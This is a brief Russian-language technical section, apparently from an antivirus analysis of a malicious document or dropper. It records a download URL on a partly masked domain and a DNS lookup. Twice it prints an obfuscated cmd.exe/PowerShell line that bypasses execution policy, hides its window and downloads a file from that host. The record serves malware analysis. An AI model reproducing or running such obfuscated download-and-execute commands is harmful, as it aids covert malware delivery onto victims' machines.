Техническая информация
- http://mo####helthc.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WERsh^el^L.eX^e -execUT^iOnp^ol^iCy BY^pasS -N^o^p^r^ofiLe -wiNdOw^s^TylE^ Hi^DDEn (^NE^W-o^b^J^EcT SYS^Te^m^.^NET.^w^eB^Cl^Ie^N^t).^DO^WnLoa^Df^ILe('http://mo####helthc.top/...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "pO^WERsh^el^L.eX^e -execUT^iOnp^ol^iCy BY^pasS -N^o^p^r^ofiLe -wiNdOw^s^TylE^ Hi^DDEn (^NE^W-o^b^J^EcT SYS^Te^m^.^NET.^w^eB^Cl^Ie^N^t).^DO^WnLoa^Df^ILe('http://mo####helthc.top/...' (со скрытым окном)